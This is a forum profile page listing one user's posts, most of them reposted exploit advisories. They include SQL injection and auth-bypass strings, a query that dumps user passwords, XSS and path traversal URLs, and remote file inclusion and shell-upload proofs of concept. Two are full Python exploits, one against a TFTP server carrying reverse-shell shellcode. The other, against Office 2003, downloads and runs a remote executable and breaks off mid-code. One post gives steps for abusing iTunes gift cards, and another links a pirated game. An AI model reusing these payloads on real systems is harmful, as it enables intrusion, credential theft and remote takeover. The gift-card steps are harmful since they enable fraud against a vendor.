Jump to content

The_Arhitect

Active Members
 View Profile  See their activity

  • Posts

    425

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by The_Arhitect

  1. The_Arhitect
  2. The_Arhitect
    Cloupia End-to-end FlexPod Management Directory Traversal *Cloupia End-to-end FlexPod Management - Directory Traversal Vulnerability*** *Advisory Information* Advisory ID: KUSTODIAN-2011-011 Date published: Jan 13, 2011 *Vulnerability Information* Class: Directory Traversal Remotely Exploitable: Yes Locally Exploitable: Yes *Software Description* Provides end-to-end FlexPod management and automation across physical, virtual, compute, storage and network resources. Create internal private clouds rapidly with internal standards and procedures to maximize the infrastructure investments. Provides comprehensive physical and virtual infrastructure management and automation. Provides unified solution and single pane of glass for consistent and connected experience across private, public & hybrid clouds. *Vulnerability Description* jQuery File Tree is a configurable, AJAX file browser plugin for the jQuery javascript library utilised within the Cloupia application framework. Unauthenticated access to this module allows a remote attacker to browse the entire file system of the host server, beyond the realm of the web service itself. Cloupia are aware of this flaw and are releasing a patch to mitigate access. End users are urged to update immediately by contacting the vendor. http://www.cloupia.com * **Technical Description* The following process performed as an attacker to exploit this vulnerability would be as follows: The code for the jQuery File Tree Java-Server-Page file reads as follows: <%@ page import="java.io.File,java.io.FilenameFilter,java.util.Arrays"%> <% /** * jQuery File Tree JSP Connector * Version 1.0 * Copyright 2008 Joshua Gould * 21 April 2008 */ String dir = request.getParameter("dir"); if (dir == null) { return; } if (dir.charAt(dir.length()-1) == '\\') { dir = dir.substring(0, dir.length()-1) + "/"; } else if (dir.charAt(dir.length()-1) != '/') { dir += "/"; } if (new File(dir).exists()) { String[] files = new File(dir).list(new FilenameFilter() { public boolean accept(File dir, String name) { return name.charAt(0) != '.'; } }); Arrays.sort(files, String.CASE_INSENSITIVE_ORDER); out.print("<ul class=\"jqueryFileTree\" style=\"display: none;\">"); // All dirs for (String file : files) { if (new File(dir, file).isDirectory()) { out.print("<li class=\"directory collapsed\"><a href=\"#\" rel=\"" + dir + file + "/\">" + file + "</a></li>"); } } // All files for (String file : files) { if (!new File(dir, file).isDirectory()) { int dotIndex = file.lastIndexOf('.'); String ext = dotIndex > 0 ? file.substring(dotIndex + 1) : ""; out.print("<li class=\"file ext_" + ext + "\"><a href=\"#\" rel=\"" + dir + file + "\">" + file + "</a></li>"); } } out.print("</ul>"); } %> *Credits* This vulnerability was discovered by Chris Rock <team@kustodian.com> and from Kustodian www.Kustodian.com. *Disclaimer* The contents of this advisory are copyright (c) Kustodian Security and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. Sursa: Cloupia End-to-end FlexPod Management Directory Traversal
  3. The_Arhitect
    PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities Title = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS] Author = Or4nG.M4n Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar This Bug Powered By : GooGLe Thnks : +----------------------------------+ | xSs m4n i-Hmx Cyber-Crystal | | Dr.Bnned ahwak2000 sa^Dev!L | +----------------------------------+ SQL Auth Bypass vuln : class_AjaxLogin.php line 73 function is_login() { <<<<==== 1 include ('../config.php'); <<<<==== 2 if(isset($_POST['username'])) { <<<<==== 3 $_SESSION['username'] = $_POST['username']; <<<<==== 4 $password = $_POST['password']; <<<<==== 5 $strSQL = <<<<==== 6 "SELECT * FROM `".$_SQL_PREFIX . $USER_Table_Name."` WHERE `LOGIN_NAME` = '".$_SESSION['username']."' AND password = md5('".$password."');"; <<<<==== 7 $result = mysql_query ($strSQL); <<<<==== 8 $row = mysql_fetch_row($result); <<<<==== 9 $exist = count($row); <<<<==== 10 if($exist >=2) { $this->jscript_location(); } <<<<==== 11 [jscript_location] function jscript_location() { <<<<==== 12 $this->set_session(); <<<<==== 13 echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14 How i can Exploit this bug : just login as = > admin ' or 1=1 # SQL injection vuln admin/index.php line 212 $sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1 $getpack = mysql_query($sql); <<<<==== 2 line 1079 showPacket($pid); <<<<==== 3 vuln index.php line 617 $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1 $result = mysql_query($SQL); <<<<==== 2 Exploit Here : index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie Cross Site Scrpting [xss] admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script> Sursa: PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities
  4. The_Arhitect
    "Eroare"
  5. The_Arhitect
    Step Number 1: Sign up for an iTunes account. Step Number 2: Make sure your balance is $0.00 or anything below $1.00 Step Number 3: Add the Prepaid Credit Card Gift Card to your iTunes account. Step Number 4: Purchase as many Albums, Songs, Apps, iBooks, Movies, Shows. Make sure to time the downloads, make sure 1 download is done before you download another (or else the card gets locked).
  6. The_Arhitect
    ========================================== # Exploit Title: pragyan 2.6.1 Upload File # Author: Dr.KroOoZ # Software : http://ignum.dl.sourceforge.net/project/pragyan/pragyan/2.6.1/pragyan-2.6.1.tar.gz # Tested on: || Linux || Windows || # Dork : ========================================== ===[ Exploit ]=== http://localhost/Path/cms/modules/article/fckEditor/editor/filemanager/browser/default/frmupload.html Then Upload Shell xD ========================================== Homepage : www.ttgsa.com ========================================== [»] Greetz to: [ ZGaRT NeT & R.B.G HackEr & No-QRQR & Mr.Abu.Z7Z7 & New KilleR & FoX HaCkeR & Mr.DH & HaNiBaL KsA ] source: exploit-db.com
  7. The_Arhitect
    Title: ====== Tine v2.0 Maischa - Cross Site Scripting Vulnerability Date: ===== 2012-01-12 References: ===========http://www.vulnerability-lab.com/get_content.php?id=379 VL-ID: ===== 379 Introduction: ============= Tine 2.0 is an open source project which combines groupware and CRM in one consistent interface. Tine 2.0 is web-based and optimises collaboration and organisation of groups in a lasting manner. Tine 2.0 unites all the advantages of open source software with an extraordinarily high level of usability and an equally high standard of professional software development. This is what makes the difference between Tine 2.0 and many other existing groupware solutions. Tine 2.0 includes address book, calendar, email, tasks, time tracking and CRM. Intelligent functions and links make collaboration in Tine 2.0 a true pleasure and include: Synchronising mobile telephones, such as iPhone, Android, Nokia and Windows Mobile VoiP integration Flexible assigning of authorisation rights Dynamic lists Search functions History PDF export (Copy from the Vendor Homepage: http://www.tine20.org/) Abstract: ========= Vulnerability-Lab Team Researcher discovered multiple persistent Web Vulnerabilities on the Tine v2.0 Content Management System. Report-Timeline: ================ 2011-12-01: Vendor Notification 2012-01-12: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== MetaWays Product: Tine CMS v2.0 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple input validation vulnerabilities(persistent) are detected on Tine v2.0 Content Management System. Local attackers can include (persistent) malicious script code to manipulate specific user/admin requests. The vulnerability allows an local privileged attacker to manipulate the appliance(application) via persistent script code inject. Successful exploitation can result in session hijacking or persistent context manipulation on requests. Vulnerable Module(s): [+] New Contacts - Input & Output [+] Lead Name - Input & Output Picture(s): ../1.png ../2.png ../3.png Risk: ===== The security risk of the persistent software vulnerability is estimated as medium(-). Credits: ======== Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright 2012|Vulnerability-Lab source: exploit-db.com
  8. The_Arhitect
    ###################################################### # Exploit Title: WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability # Date: 2012-11-01 # Author: longrifle0x # software: Wordpress # Download:http://wordpress.org/extend/plugins/wp-autoyoutube/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in wp-autoyoutube, Wordpress Plugin, vulnerability is Blind SQL injection. File:wp-content/plugins/wp-autoyoutube/modules/index.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER() http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6) source: exploit-db.com
  9. The_Arhitect
    # Exploit Title: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability # Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net ) # Software Link: http://yabsoft.com/ # Tested on: [Linux/Windows 7] #Vulnerable File: view_comments.php #Vulnerable parameter: view_comments.php?gal=[gallery id] ############################################################## PoC: www.example.com/view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users-- ############################################################## www.areyousecure.net www.websiteauditing.org # Shouts to the Belegit crew source: exploit-db.com
  10. The_Arhitect
    Grand Theft Auto San Andreas-HOODLUM (download torrent) - TPB
  11. The_Arhitect
    Title Pragyan CMS v 3.0 => [Remote File Disclosure] Author Or4nG.M4n Download http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2 vuln download.lib.php line 16 vuln index.php line 234 $_GET['fileget'] exploit http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.ini Download Config file exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php source: exploit-db.com
  12. The_Arhitect
    # Exploit Title: W-Cms Multiple Vulnerability # Date: 2012-01-09 # Author: th3.g4m3_0v3r # Site:http://w-cms.info/ # Software Link: http://code.google.com/p/wcms/ # Dork: intext:"Powered by w-CMS" # Version : [2.01] # Tested on: Window 7 # Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt # www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.h4ck3r.in www.root-team.com www.hackingmind.com ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ W-CMS cross site scripting _______________ Vulnerable Link __________\/_____________________ _______________ http://localhost/index.php?bid=1&COMMENT=1 "XSS" http://localhost/?p=3"XSS" http://localhost/?bid=5&p=1"XSS" http://localhost/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ directory traversal attacks This script is possibly vulnerable to directory traversal attacks http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net source: exploit-db.com
  13. The_Arhitect
    # Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect # Date: 2012/01/10 # Dork: inurl:wp-content/plugins/age-verification/age-verification.php # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/age-verification.zip # Version: 0.4 1) Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com 2) Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com source: exploit-db.com
  14. The_Arhitect
    #!/usr/bin/python #---------------------------------------------------------------------------# # Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) # # OS: Windows XP PRO SP3 # # Author: b33f # #---------------------------------------------------------------------------# # Smashing the stack for fun and practise... # # # # This tftp service have been pwned extensively: # # (1) Muts ==> WRQ Overflow # # http://www.exploit-db.com/exploits/5314/ # # (2) Molotov ==> WRQ Overflow # # http://www.exploit-db.com/exploits/10542/ # # (3) tixxDZ ==> ERROR Overflow # # http://www.exploit-db.com/exploits/5563/ # # # # Vulnerable software: # # http://www.exploit-db.com/application/5314/ # #---------------------------------------------------------------------------# # After some simple fuzzing with spike I discovered that sending a Read # # Request (RRQ) packet can also trigger a buffer overflow... # #---------------------------------------------------------------------------# # It might take up to 30 seconds for some reason but the shell does appear # # as expected.... # # # # root@bt:~# nc -lvp 9988 # # listening on [any] 9988 ... # # 192.168.111.128: inverse host lookup failed: Unknown server error # # connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Program Files\TFTPServer> # #---------------------------------------------------------------------------# import socket import sys host = '192.168.111.128' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) #msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00' #x86/shikata_ga_nai succeeded with size 341 (iteration=1) shell = ( "\xbb\x3c\xef\xdb\xc5\xdb\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\xde\x1a\x27\x2d\x97" "\xe5\xd8\xae\xc7\x6c\x3d\x9f\xd5\x0b\x35\xb2\xe9\x58\x1b\x3f" "\x82\x0d\x88\xb4\xe6\x99\xbf\x7d\x4c\xfc\x8e\x7e\x61\xc0\x5d" "\xbc\xe0\xbc\x9f\x91\xc2\xfd\x6f\xe4\x03\x39\x8d\x07\x51\x92" "\xd9\xba\x45\x97\x9c\x06\x64\x77\xab\x37\x1e\xf2\x6c\xc3\x94" "\xfd\xbc\x7c\xa3\xb6\x24\xf6\xeb\x66\x54\xdb\xe8\x5b\x1f\x50" "\xda\x28\x9e\xb0\x13\xd0\x90\xfc\xff\xef\x1c\xf1\xfe\x28\x9a" "\xea\x75\x43\xd8\x97\x8d\x90\xa2\x43\x18\x05\x04\x07\xba\xed" "\xb4\xc4\x5c\x65\xba\xa1\x2b\x21\xdf\x34\xf8\x59\xdb\xbd\xff" "\x8d\x6d\x85\xdb\x09\x35\x5d\x42\x0b\x93\x30\x7b\x4b\x7b\xec" "\xd9\x07\x6e\xf9\x5b\x4a\xe7\xce\x51\x75\xf7\x58\xe2\x06\xc5" "\xc7\x58\x81\x65\x8f\x46\x56\x89\xba\x3e\xc8\x74\x45\x3e\xc0" "\xb2\x11\x6e\x7a\x12\x1a\xe5\x7a\x9b\xcf\xa9\x2a\x33\xa0\x09" "\x9b\xf3\x10\xe1\xf1\xfb\x4f\x11\xfa\xd1\xf9\x16\x6d\x1a\x51" "\xf7\xea\xf2\xa0\x07\xd4\x06\x2c\xe1\x70\x17\x78\xba\xec\x8e" "\x21\x30\x8c\x4f\xfc\xd0\x2d\xdd\x9b\x20\x3b\xfe\x33\x77\x6c" "\x30\x4a\x1d\x80\x6b\xe4\x03\x59\xed\xcf\x87\x86\xce\xce\x06" "\x4a\x6a\xf5\x18\x92\x73\xb1\x4c\x4a\x22\x6f\x3a\x2c\x9c\xc1" "\x94\xe6\x73\x88\x70\x7e\xb8\x0b\x06\x7f\x95\xfd\xe6\xce\x40" "\xb8\x19\xfe\x04\x4c\x62\xe2\xb4\xb3\xb9\xa6\xc5\xf9\xe3\x8f" "\x4d\xa4\x76\x92\x13\x57\xad\xd1\x2d\xd4\x47\xaa\xc9\xc4\x22" "\xaf\x96\x42\xdf\xdd\x87\x26\xdf\x72\xa7\x62") #---------------------------------------------------------------------------# # (1) Stage1: 0x00409605 TFTPServer.exe - PPR # # => 3-byte overwrite using the mandatory protocol null-byte. # # (2) Stage2: jump back 5-bytes "\xEB\xF9" so we have room for a far jump. # # (3) Stage3: jump back 1490-bytes to the beginning of our buffer. # # (4) Stage4: reverse shell port 9988 - size 341 # #---------------------------------------------------------------------------# stage4 = "\x90"*50 + shell stage3 = "\xE9\x2E\xFA\xFF\xFF" stage2 = "\xEB\xF9\x90\x90" stage1 = "\x05\x96\x40" filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1 mode = "netascii" youlose = "\x00\x01" + filename + "\x00" + mode + "\x00" s.sendto(youlose, (host, port)) source: exploit-db.com
  15. The_Arhitect
    Cu p*la nu merge controlat? ))
  16. The_Arhitect
    # Exploit Title: razorCMS 1.2 Path Traversal # Google Dork: "Powered by razorCMS" # Date: January 10, 2012 # Author: chap0 # Software Link: http://www.razorcms.co.uk/archive/core/ # Version: 1.2 # Tested on: Ubuntu # Patch: Upgrade to latest release 1.2.1 # Greetz To: <Insert Name Here> RazorCMS is vulnerable to Path Traversal, when logged in with a least privileged user account the user can access the administrator's and super administrator's directories and files by changing the path in the url. The vulnerabilities exist in admin_func.php Patch Time line: Dec 11, 2011 - Contacted Vendor Dec 11, 2011 - Vendor Replied ask for details of vulnerability Dec 12, 2011 - Submitted details Dec 13, 2011 - No reply asked for an update Dec 13, 2011 - Vendor Replied asking for a week or two for a fix after the holiday period Dec 20, 2011 - Emailed Vendor for an update Dec 21, 2011 - Vendor confirmed vulnerabilities asked for two weeks time for a fix Dec 27, 2011 - Emailed vendor some "temp fixes" for the vulnerabilities discovered Jan 3, 2012 - Emailed vendor more "temp fixes" Jan 5, 2012 - Vendor replied sent a new updated file v1 admin_func.php Jan 5, 2012 - Replied to vendor discovered more vulnerabilities Jan 6, 2012 - Vendor response with new file with fixes v2 admin_func.php Jan 6, 2012 - Tested discovered more vulnerabilities Jan 8, 2012 - Vendor replied with new file v3 admin_func.php Jan 8, 2012 - Tested, vulnerabilities are fixed reported to vendor Jan 9, 2012 - Vendor released update 1.2.1 Jan 10, 2012 - Public Disclosure Path Traversal Details: The following files and directories are vulnerable to Path Traversal Attack including any files or directories that the admin or super admin may create within these directories http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/ http://razorcms-server/admin/?action=filemanview&dir=backup/ http://razorcms-server/admin/?action=filemanview&dir=/razor_data.txt http://razorcms-server/admin/?action=filemanview&dir=/index.htm http://razorcms-server/admin/?action=fileman&dir=razor_temp_logs/ http://razorcms-server/admin/?action=fileman&dir=backup/ http://razorcms-server/admin/?action=fileman&dir=/razor_data.txt http://razorcms-server/admin/?action=fileman&dir=/index.htm An example would be if the super admin created a directory within razor_temp_logs named sekrit which should not be accessible with a least privileged user, the least privileged user can change the path as shown below: http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/ Which also works on files within those directories which the user should not have access to which at this point gives the user access to view, edit, rename, move, copy and delete the file. e.g. http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt Another vulnerability exist in this version of razorCMS, if a least privileged user creates a directory with their logged in credentials, and then deletes the directory, the user will then have access to the administrative directories and files. source: exploit-db.com
  17. The_Arhitect
    Ce dracu ai ma in capu ala cacat?
  18. The_Arhitect
    #!/usr/bin/python # Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability # Version: 1.1.73.2 # Date: 2012-01-08 # Author: Julien Ahrens # Homepage: www.inshell.net # Software Link: http://www.geopainting.com # Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German file="GPSMapEdit_crash.lst" junk="\x41"*512 print "[*] Creating crash file...\n"; writeFile = open (file, "w") writeFile.write(junk) writeFile.close() print "[*] File successfully created!\n\n"; source: exploit-db.com
  19. The_Arhitect
    # Exploit : Multiple Vulnerability on ClipBucket 2.6 # Date : 09 January 2012 # Author : YaDoY666 # Website : http://yadoy666.serverisdown.org # Software : Clip Bucket (Open Source Video Sharing) # Version : 2.6 # Vendor : Clip Bucket (http://clip-bucket.com) # Vendor Response : None Cross Site Scripting ==================== [[=]] http://[site]/[path]/channels.php [[=]] http://[site]/[path]/collections.php [[=]] http://[site]/[path]/groups.php [[=]] http://[site]/[path]/search_result.php [[=]] http://[site]/[path]/videos.php [[=]] http://[site]/[path]/view_collection.php [[=]] http://[site]/[path]/view_item.php Example : http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://[site]/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://[site]/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://[site]/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type= http://[site]/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://[site]/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E http://[site]/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E SQL Injection ============== [[=]] http://[site]/[path]/channels.php [[=]] http://[site]/[path]/videos.php Example : http://[site]/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 http://[site]/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 Greets : KombezNux | Jack | X-Shadow | Don Tukulesto | GBlack | elv1n4 | GBlack | Kamtiez | n4ck0 | AaEzha | ServerIsDown | Indonesian Coder | source: exploit-db.com
  20. The_Arhitect
    # Exploit Title: SAPID Stable (RFI) # Google Dork: tanyakan pada dan pemula # Date: January 08 2011 # Author: Opa Yong # Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/ # Version: SAPID 1.2.3 Stable # Tested on: Windows XP Home Edition SP2 @POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?] @POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?] Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker. Special thanks for Dan Pemula source: exploit-db.com
  21. The_Arhitect
    #!/usr/bin/python # # Note from the Exploit-DB team: This might be the same bug as: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb # #-----------------------------------------------------------------------------------# # Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 # # Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) # ##################################################################################### # One shellcode to rule them all, One shellcode to find them, One shellcode to # # bring them all and in the darkness bind them!! # # # # Greetings: offsec, corelan, setoolkit # ##################################################################################### # (1) root@bt:~/Desktop/office# ./office2003.py # # root@bt:~/Desktop/office# mv evil.doc /var/www/ # # # # (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X # # > /var/www/magic.exe # # # # (3) msf exploit(handler) > exploit # # # # [*] Started reverse handler on 192.168.111.132:9988 # # [*] Starting the payload handler... # # [*] Sending stage (752128 bytes) to 192.168.111.128 # # [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)# # at 2012-01-08 18:46:26 +0800 # # # # meterpreter > ipconfig # # # # MS TCP Loopback interface # # Hardware MAC: 00:00:00:00:00:00 # # IP Address : 127.0.0.1 # # Netmask : 255.0.0.0 # # # # AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport # # Hardware MAC: 00:0c:29:6c:92:42 # # IP Address : 192.168.111.128 # # Netmask : 255.255.255.0 # #-----------------------------------------------------------------------------------# import binascii filename = "evil.doc" #-----------------------------------------------------------------------------------# # File Structure # #-----------------------------------------------------------------------------------# file = ( "{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s" "hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*" "\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff") #-----------------------------------------------------------------------------------# # Open raw socket to download payload to parent directory as "a.exe" # # ==> cmd execute "a.exe" # #-----------------------------------------------------------------------------------# magic = ( "\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30" "\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65" "\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39" "\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63" "\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35" "\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61" "\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34" "\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63" "\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64" "\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38" "\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36" "\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62" "\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34" "\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66" "\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62" "\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65" "\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66" "\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31" "\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30" "\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61" "\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64" "\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64" "\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38" "\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66" "\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38" "\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66" "\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65" "\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30" "\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30") #------------------------------------------------------------------------------------------------------------------------------# # Two versions of office 2003 floating around: # # (1) Standalone version, (2) XP Service Pack upgrade # ################################################################################################################################ # Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... # # # # (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" # # => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe # # # # (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" # # => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe # #------------------------------------------------------------------------------------------------------------------------------# EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18 buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic #-----------------------------------------------------------------------------------# # Since we are downloading our payload from a remote webserver there are no # # restrictions on payload size or badcharacters... # #-----------------------------------------------------------------------------------# URL = "http://192.168.111.132/magic.exe" binnu = binascii.b2a_hex(URL) URL2 = "00" nxt="{}}}}}}" nxt+="\x0d\x0a" nxt+="}" textfile = 